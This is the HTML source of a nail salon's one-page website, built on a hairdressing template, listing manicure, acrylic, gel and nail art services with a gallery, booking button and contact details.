<!DOCTYPE html> <!--[if lt IE 7 ]><html class="ie ie6" lang="en"> <![endif]--> <!--[if IE 7 ]><html class="ie ie7" lang="en"> <![endif]--> <!--[if IE 8 ]><html class="ie ie8" lang="en"> <![endif]--> <!--[if (gte IE 9)|!(IE)]><!--> <html lang="en"> <!--<![endif]--> <head> <meta charset="UTF-8"> <meta name="google-site-verification" content="vrudAJRigjEInVJiWPdBLvA2t69dvWJS7shWzKu8YWU" /> <title>Cutting Edge Hairdressing</title> <meta name="description" content=""> <meta name="author" content=""> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script type="text/javascript" src="js/pace.min.js"></script> <link rel="stylesheet" type="text/css" href="css/pace.css"> <!-- Favicons --> <link rel="shortcut icon" href="images/favicon.ico"> <link rel="apple-touch-icon" href="images/Logo-TransparentBackGround.png"> <link rel="apple-touch-icon" sizes="72x72" href="images/Logo-TransparentBackGround.png"> <link rel="apple-touch-icon" sizes="114x114" href="images/Logo-TransparentBackGround.png"> <style type="text/css"> body >:not(.pace), body:before, body:after { -webkit-transition: opacity .4s ease-in-out; -moz-transition: opacity .4s ease-in-out; -o-transition: opacity .4s ease-in-out; -ms-transition: opacity .4s ease-in-out; transition: opacity .4s ease-in-out } body:not(.pace-done) >:not(.pace), body:not(.pace-done):before, body:not(.pace-done):after { opacity: 0 } .page { padding-top: 50px !important; padding-bottom: 50px !important; } </style> <!-- CSS Styles --> <link rel="stylesheet" type="text/css" href="css/skeleton.css"> <link rel="stylesheet" type="text/css" href="css/layout.css"> <link rel="stylesheet" type="text/css" href="css/prettyPhoto.css"> <!-- Google Web Fonts --> <link href="http://fonts.googleapis.com/css?family=Oswald:400,300,700" rel="stylesheet" type="text/css"> <!-- JavaScripts --> <script type="text/javascript" src="js/jquery-1.9.1.min.js"></script> <script type="text/javascript"> //<![CDATA[ var isMobile = false; if (navigator.userAgent.match(/Android/i) || navigator.userAgent.match(/webOS/i) || navigator.userAgent.match(/iPhone/i) || navigator.userAgent.match(/iPad/i) || navigator.userAgent.match(/iPod/i) || navigator.userAgent.match(/BlackBerry/i)) { isMobile = true; } /*iOS5 fixed-menu fix*/ var iOS5 = false; if (navigator.userAgent.match(/OS 5(_\d)+ like Mac OS X/i)) { iOS5 = true; } //]]> //<![CDATA[ $(document).ready(function() { $("nav").sticky({ topSpacing: 0 }); }); //]]> </script> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-1844565308792438", enable_page_level_ads: true }); </script> </head> <body> <!-- Start Homepage --> <div id="homepage" class="homepage section"> <div class="three columns"> <img alt="" class="logo" src="images/Logo-TransparentBackGround-389x128.png" /> </div> <div class="container"> <div class="slider-text"> <!--<div class="thirteen columns"> <div id="slidecaption"></div> </div>--> <div class="three columns"> <a id="prevslide" class="load-item"></a> <a id="nextslide" class="load-item"></a> </div> </div> </div> </div> <!--End homepage --> <!-- Start Navigation --> <nav> <div class="container"> <div class="sixteen columns"> <!-- Start Nav Menu --> <ul class="menu" id="nav"> <li><a href="#homepage">Home</a></li> <li><a href="#salon">Salon</a></li> <li><a href="#services">Services</a></li> <li><a href="#products">Products</a></li> <li><a href="#promotions">Expertise</a></li> <li><a href="#gallery">Gallery</a></li> <li><a href="#contact">Contact</a></li> </ul> <!-- End Nav Menu --> <!-- Start Dropmenu for mobile --> <select class="dropmenu" name="dropmenu" onChange="moveTo(this.value)"> <option value="" selected="selected">Menu</option> <option value="#homepage">Home</option> <option value="#salon">Salon</option> <option value="#services">Services</option> <option value="#products">Products</option> <option value="#promotions">Expertise</option> <option value="#gallery">Gallery</option> <option value="#contact">Contact</option> </select> <!-- End Dropmenu for mobile --> <script id="setmore_script" type="text/javascript" src="https://my.setmore.com/js/iframe/setmore_iframe.js"></script> <a id="Setmore_button_iframe" style="float:none" href="https://my.setmore.com/shortBookingPage/ed44f5b3-9104-415d-9f00-0ed589680269"><img border="none" src="https://my.setmore.com/images/bookappt/SetMore-book-button.png" alt="Book an appointment with Keya's Nail Nirvana using SetMore" /></a> </div> </div> </nav> <!-- End Navigation --> <!-- Start Salon Page --> <div id="salon" class="page section"> <div class="container"> <div class="sixteen columns"> <h1 style="text-transform: capitalize;">WELCOME TO KEYA’S NAIL NIRVANA</h1> </div> <div class="one-third column"> <img alt="" class="scale-with-grid salonImage" src="images/salon1.jpg" /> </div> <div class="one-third column"> <img alt="" class="scale-with-grid salonImage" src="images/salon2.jpg" /> </div> <div class="one-third column"> <img alt="" class="scale-with-grid salonImage" src="images/salon3.jpg" /> </div> <div class="twelve columns offset-by-two"> <div class="introtext"> <p>Welcome to Keya’s nail Nirvana, we are here to make a difference in nails art industry. Beauty is not what you see, it is what you are , what goes inside shows outside. Nail art is not only about making your nails look beautiful and fashionable but it is the expression of your personality. Let your nails do the talking. With high quality products and experience we make your nails beautiful inside out </p> </div> <div class="introtext"> <p>While running my Nail Art & Henna Tattoo business in USA I got lots of compliments for the Indian fusion style of nail art. My China excursion has opened a whole new world of art to me . My creativity comes from the diversity of my experience.</p> </div> </div> <!-- <div class="sixteen columns"> <h2>Meet the Team</h2> </div> <div class="four columns offset-by-two"> <div class="teamOverlay"></div> <div class="teamImage"><img src="images/team/team1.jpg" alt="" class="scale-with-grid" /></div> <h4>Sarah Johnson</h4> </div> <div class="four columns"> <div class="teamOverlay"></div> <div class="teamImage"><img src="images/team/team2.jpg" alt="" class="scale-with-grid" /></div> <h4>Melinda Smith</h4> </div> <div class="four columns"> <div class="teamOverlay"></div> <div class="teamImage"><img src="images/team/team3.jpg" alt="" class="scale-with-grid" /></div> <h4>Jessica Instinct</h4> </div> <div class="sixteen columns"> <h3 class="sectionTitle">Career Opportunities</h3> </div> <div class="ten columns offset-by-three"> <p class="introtext">Interested in becoming part of our great team, <br><a href="#contact">contact us</a> today to find out how you can have the opportunity.</p> </div> --> </div> </div> <!-- End Salon Page --> <!--start parallax 1--> <div id="parallax-1" class="parallax fixed" style="height: 700px; background-image: url(images/parallax/parallax-1.jpg);"> <div class="quoteWrap"> <div class="quote"> <div class="container"> <div class="sixteen columns"> <h2 style="color: #fff; font-weight: 700; font-size: 95px; text-shadow: 5px 5px 5px #222;">CUTTING EDGE</h2> </div> </div> </div> </div> </div> <!--end parallax--> <!-- Start Awards Page --> <!-- <div id="awards" class="page section"> <div class="container"> <div class="sixteen columns"> <h1><span>Our</span> Awards</h1> <div class="introtext"> <p>Morbi suscipit interdum molestie. Aenean fringilla dui magna. <span class="highlight">Pellentesque habitant</span> morbi tristique senectus et netus et malesuada fames ac turpis egestas. Duis porttitor, velit et pretium porttitor, tellus massa porttitor tortor, accumsan cursus nulla nisi at tellus. <strong>Lorem ipsum dolor sit amet,</strong> consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum. Praesent porta, purus eget sagittis imperdiet, nulla mi ullamcorper metus, id hendrerit metus diam vitae est.</p> </div> </div> </div> <div class="container"> <div class="eight columns"> <div class="awardsImage"> <img class="scale-with-grid" alt="" src="images/awards.jpg" /> </div> </div> <div class="eight columns awardsListing"> <h2>Salon Awards</h2> <h3>Hair Expo</h3> <ul> <li><span>Winner – excellence in salon marketing.</span></li> <li><span>Finalist – new business.</span></li> <li><span>Finalist – apprentice of the year.</span></li> </ul> <h3>Victorian Hair Awards</h3> <ul> <li><span>Winner – salon business of the year.</span></li> </ul> <h3>Australian Hair Fashion Awards</h3> <ul> <li><span>Winner – salon business of the year.</span></li> <li><span>Finalist – VIC hairdresser of the year.</span></li> </ul> <h3>Wella Australia</h3> <ul> <li><span>Winner – best female image.</span></li> </ul> <h3>IHS</h3> <ul> <li><span>Face of IHS – Judges award for excellence.</span></li> </ul> <h3>Hair Awards</h3> <ul> <li><span>Winner – salon business of the year.</span></li> </ul> </div> <div class="sixteen columns "> <h3 class="sectionTitle">Youtube & Vimeo Support</h3> <p>Embed Videos directly from your favourite video websites like Vimeo or Youtube & show off your Creativity.</p> <div class="video-container"> <iframe width="1280" height="720" src="http://www.youtube.com/embed/a92AAKgSWz4" frameborder="0" allowfullscreen></iframe> </div> </div> <div class="sixteen columns"> <h3 class="sectionTitle">Our Stats</h3> </div> <ul class="statGrid clearfix"> <li> <div class="statItem"> <div class="statInfo"> <h3>1,367,965</h3> <p>Strands of <br>hair cut</p> </div> <div class="statThumb stat-1"></div> </div> </li> <li> <div class="statItem"> <div class="statInfo"> <h3>346</h3> <p>Colours to <br>choose from</p> </div> <div class="statThumb stat-2"></div> </div> </li> <li> <div class="statItem"> <div class="statInfo"> <h3>4,879</h3> <p>Blowdry's <br>a week</p> </div> <div class="statThumb stat-3"></div> </div> </li> <li> <div class="statItem"> <div class="statInfo"> <h3>1,976</h3> <p>Satisfied <br>Clients</p> </div> <div class="statThumb stat-4"></div> </div> </li> <li> <div class="statItem"> <div class="statInfo"> <h3>47</h3> <p>Litres of Bleach <br>used every <br>week</p> </div> <div class="statThumb stat-5"></div> </div> </li> <li> <div class="statItem"> <div class="statInfo"> <h3>123,456</h3> <p>Curls Twisted</p> </div> <div class="statThumb stat-6"></div> </div> </li> </ul> </div> </div> --> <!-- End Awards Page --> <!--start parallax 2--> <!--end parallax 2--> <!-- Start Services Page --> <div id="services" class="page section"> <div class="container"> <div class="sixteen columns"> <h1>Services</h1> <div class="introtext"> <p>Our spa manicure, nail art, acrylic & gel services soothe with a warm neck pillow. Skin exfoliation and a hydrating massage are extended to the elbow for manicures. A paraffin treatment seals in moisture for softer hands and feet. Nails are polished to perfection with our luxury nail care services. </p> </div> </div> <!-- Start Icons --> <div class="one-third column"> <h2>Manicure</h2> <div class="serviceImage" style="background-image: url(./images/cut.jpg)"> </div> <table> <tr> <td>Manicure </td> </tr> <tr> <td>Spa manicure</td> </tr> <tr> <td>French polish </td> </tr> <tr> <td>Polish change </td> </tr> </table> </div> <div class="one-third column"> <h2>Acrylic & Gel </h2> <div class="serviceImage" style="background-image: url(./images/colour.jpg)"></div> <table> <tr> <td>Acrylic Nail extension </td> </tr> <tr> <td>Gel Nail extension </td> </tr> <tr> <td>Stick on nail extension </td> </tr> <tr> <td>French white & pink Acrylic / Gel</td> </tr> <tr> <td>Overlay</td> </tr> <tr> <td>Removal</td> </tr> <tr> <td>Fill</td> </tr> <tr> <td>Tip change </td> </tr> <tr> <td>Nail fixing </td> </tr> </table> </div> <div class="one-third column"> <h2>Nail Art </h2> <div class="serviceImage" style="background-image: url(./images/style.jpg)"> </div> <table> <tr> <td>3D gel art</td> </tr> <tr> <td>2D art</td> </tr> <tr> <td>Free hand</td> </tr> <tr> <td>Gems </td> </tr> </table> </div> <!-- End Table --> </div> </div> <div id="parallax-2" class="parallax fixed" style="background-image: url(images/parallax/parallax-2-2.jpg);"> <div class="quoteWrap"> <div class="quote"> <div class="container"> <div class="sixteen columns"> <!-- <ul id="twitter"></ul> --> <!-- <script type="text/javascript"> jQuery(document).ready(function($) { $.getJSON('http://api.twitter.com/1/statuses/user_timeline.json?screen_name=envato&count=1&callback=?', function(tweets) { $("#twitter").html(tz_format_twitter(tweets)); }); }); </script> --> </div> </div> </div> </div> </div> <div id="products" class="page section"> <div class="container"> <div class="sixteen columns"> <h2>Our Products</h2> </div> <div class="four columns offset-by-two"> <div class="teamOverlay"></div> <div class="teamImage"><img src="images/product/product1.jpg" alt="" class="scale-with-grid" /></div> </div> <div class="four columns"> <div class="teamOverlay"></div> <div class="teamImage"><img src="images/product/product2.jpg" alt="" class="scale-with-grid" /></div> </div> <div class="four columns"> <div class="teamOverlay"></div> <div class="teamImage"><img src="images/product/product3.jpg" alt="" class="scale-with-grid" /></div> </div> </div> </div> <!--end services--> <!--start parallax 3--> <div id="parallax-3" class="parallax fixed" style="height: 700px; background-image: url(images/parallax/parallax-3.jpg);"> <div class="quoteWrap"> <div class="quote"> <div class="container"> <div class="sixteen columns"> <div class="imageClip2"> <!-- <img alt="" src="images/parallax/model-clipped-2.png" class="scale-with-grid" /> --></div> </div> </div> </div> </div> </div> <!--end parallax 3--> <!--start Promotions --> <div id="promotions" class="page section"> <div class="container"> <div class="sixteen columns"> <h1><span>Expertise</h1> </div> <div class="sixteen columns"> <p class="introtext"> We Have Specialized In Quality Nail Services And Inspired Nail Art Since years. We Encourage Our Clients’ Creative Expression While Providing A Stylish & Friendly Environment Without Pretense. valley Offers Only Toxin-free Nail Polish, We Also Offer 7- Free Gel Polish, And We Are Committed To Using Toxin-free And 100% Natural Products For Our Services And Sanitation Whenever Possible.</p> <p class="introtext">We Provide An Elegant, Sophisticated Environment And Relaxed Ambience In Which Every Customer Can Enjoy A Hygienic And Comfortable Nail Art Service. I Have An Extensive Experience, Together With A Practical And Proficient Approach, Giving Customers The Utmost In Professionalism, Sincere Service And Satisfaction. </p><p class="introtext"> Keya’s Nail Nirvana Offers Customers A Comprehensive Service; As Well As Our Distinctive Nail Art Services, Our Professional Manicurist Gives The Finest Attention To Provide Customers With The Most Elegantly Attractive Hands And Nails. </p> <!-- Accordion #1 --><!-- <span class="accTrigger question"><a href="#">Free Colour treatment</a></span> <div class="accContainer"> <div class="accContent"> <div class="accImage"> <div class="accImageInner"> <img src="images/promotions/promo-1.jpg" alt="" class="scale-with-grid" /> </div> </div> <div class="accTitle"> <h3>Recieve free Colour Treatment for the month of April</h3> </div> <div class="accText"> <p>Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. </p> <p>Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. </p> </div> </div> </div> Accordion #2 --> <!-- <span class="accTrigger question"><a href="#">Free Hair Treatment</a></span> <div class="accContainer"> <div class="accContent"> <div class="accImage"> <div class="accImageInner"> <img src="images/promotions/promo-2.jpg" alt="" class="scale-with-grid" /> </div> </div> <div class="accTitle"> <h3>Recieve free Hair Treatment with your next cut & colour</h3> </div> <div class="accText"> <p>Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. </p> <p>Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. </p> </div> </div> </div> --> <!-- Accordion #3 --> <!-- <span class="accTrigger question"><a href="#">Look your best with our beauty treatments</a></span> <div class="accContainer"> <div class="accContent"> <div class="accImage"> <div class="accImageInner"> <img src="images/promotions/promo-3.jpg" alt="" class="scale-with-grid" /> </div> </div> <div class="accTitle"> <h2>20% OFF</h2> <h3>Look your best with our deluxe beauty treatments</h3> </div> <div class="accText"> <p>Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. </p> <p>Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. </p> </div> </div> </div> --> <!-- Accordion #4 --> <!-- <span class="accTrigger question"><a href="#">Straightening Specials</a></span> <div class="accContainer"> <div class="accContent"> <div class="accImage"> <div class="accImageInner"> <img src="images/promotions/promo-4.jpg" alt="" class="scale-with-grid" /> </div> </div> <div class="accTitle"> <h3>Recieve FREE Hair Straightened on your next visit</h3> </div> <div class="accText"> <p>Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. </p> <p>Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. </p> </div> </div> </div> --> <!-- Accordion #5 --> <!-- <span class="accTrigger question"><a href="#">Makeover Deals</a></span> <div class="accContainer"> <div class="accContent"> <div class="accImage"> <div class="accImageInner"> <img src="images/promotions/promo-5.jpg" alt="" class="scale-with-grid" /> </div> </div> <div class="accTitle"> <h3>Talk to us about our great makeover and fancy dress deals</h3> </div> <div class="accText"> <p>Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. </p> <p>Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. </p> </div> </div> </div> --> <!-- Accordion #6 --> <!-- <span class="accTrigger question"><a href="#">Beauty Treatment Weekly Special</a></span> <div class="accContainer"> <div class="accContent"> <div class="accImage"> <div class="accImageInner"> <img src="images/promotions/promo-6.jpg" alt="" class="scale-with-grid" /> </div> </div> <div class="accTitle"> <h3>Recieve FREE Colour Treatment for the month of April</h3> </div> <div class="accText"> <p>Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. </p> <p>Sed posuere consectetur est at lobortis. Nulla vitae elit libero, a pharetra augue. Duis mollis, est non commodo luctus, nisi erat porttitor ligula, eget lacinia odio sem nec elit. </p> </div> </div> </div> --> </div> </div> </div> <!--end Promotions--> <!--start parallax 4--> <div id="parallax-4" class="parallax fixed" style="height: 700px; background-image: url(images/parallax/parallax-4.jpg);"> <div class="quoteWrap"> <div class="quote"> <div class="container"> <div class="sixteen columns"> <h3 style="color: #fff; font-weight: 700; font-size: 95px; text-shadow: 5px 5px 5px #222;">CREATIVE.ARTISTIC.PASSIONATE.</h3> </div> </div> </div> </div> </div> <!--end parallax 4--> <!--start Gallery --> <div id="gallery" class="page section"> <div class="container"> <div class="sixteen columns"> <h1><span>Our</span> Gallery</h1> <h3>We love nails - this is a passion for us not just a job!</h3> </div> <div class="da-thumbs"> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-01.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-01-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-02.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-02-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-03.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-03-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-04.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-04-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-05.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-05-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-06.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-06-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-07.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-07-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-08.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-08-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-09.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-09-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-10.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-10-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-11.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-11-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-12.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-12-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-13.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-13-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-14.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-14-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-15.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-15-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-16.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-16-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-17.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-17-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-18.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-18-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-19.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-19-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-20.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-20-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-21.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-21-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-22.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-22-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-23.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-23-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-24.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-24-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <article class="one-fifth column"> <a class="thumbLink" href="images/gallery/gallery-25.jpg" rel="prettyPhoto[gallery1]" title="Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas ac augue at erat hendrerit dictum."> <section class="thumbImage"> <div><span class="iconWrapper iconLink"></span></div> <img src="images/gallery/gallery-25-thumb.jpg" alt="" class="scale-with-grid" /> </section> </a> </article> <!-- Flickr --> <!-- <div class="sixteen columns latestFlickr"> <h3 class="sectionTitle">Flickr Feed</h3> <div class="flickrListing"> <div class="flickrListingInner"> <script type="text/javascript" src="http://www.flickr.com/badge_code_v2.gne?count=8&amp;display=latest&amp;size=s&amp;layout=x&amp;source=user&amp;user=21644167@N04"></script> </div> <div class="clearfix"></div> </div> </div> --> </div> </div> </div> <!--end Gallery--> <!--start parallax 5--> <div id="parallax-5" class="parallax fixed" style="background-image: url(images/parallax/parallax-5.jpg);"> <div class="quoteWrap"> <div class="quote"> <div class="container"> <div class="sixteen columns"> <h3 style="color: #fff; font-weight: 500; font-size: 75px; text-transform: uppercase; text-shadow: 5px 5px 5px #222;">How can I control my life when <br/>I can't control my nails? </h3> </div> </div> </div> </div> </div> <!--end parallax 5--> <!--start contact--> <div id="contact" class="page section"> <div class="container"> <div class="sixteen columns"> <h1>Contact <span>Us</span></h1> </div> <!--<div class="four columns marginTop contactDetails offset-by-two"> <p class="contactAddress">13004 Elm Tree Dr, Apt 204 <br/>Herndon, VA, 20171 <br/>USA</p> </div>--> <div class="four columns marginTop contactDetails offset-by-five"> <p class="contactPhone">Phone: +91-704-220-6390</p> <p class="contactEmail">Email: <a href="#">aurpita.paul@keyasnailnirvana.com</a></p> </div> <div class="four columns marginTop contactDetails"> <p class="contactTime"> Mon-Fri: 9:00am &rarr; 5:30pm <br/> Sat: 10:00am &rarr; 2:30pm <br/> Sunday: Closed </p> </div> <!--<div class="sixteen columns marginTop"> <h2>Get the latest news & offers</h2> <form action="#" method="post" class="newsForm"> <div> <input type="text" class="formField" title="Name" name="cm-name" id="name" /> <input type="text" class="formField" title="Email" name="cm-email" id="email" /> <input type="submit" value="submit" /> </div> </form> </div> --> </div> <div class="embed-container"> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3887.6695059738527!2d77.66638031437547!3d12.992977790841852!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3bae11477b41812f%3A0x68e1788647c62bce!2sSAF+Tejas+Bloomingdale%2C+14th+B+Cross+Rd%2C+Gangappa+Layout%2C+Pai+Layout%2C+Bengaluru%2C+Karnataka+560016!5e0!3m2!1sen!2sin!4v1498848591089" width="600" height="450" frameborder="0" style="border:0" allowfullscreen></iframe> <br /><small> </div> 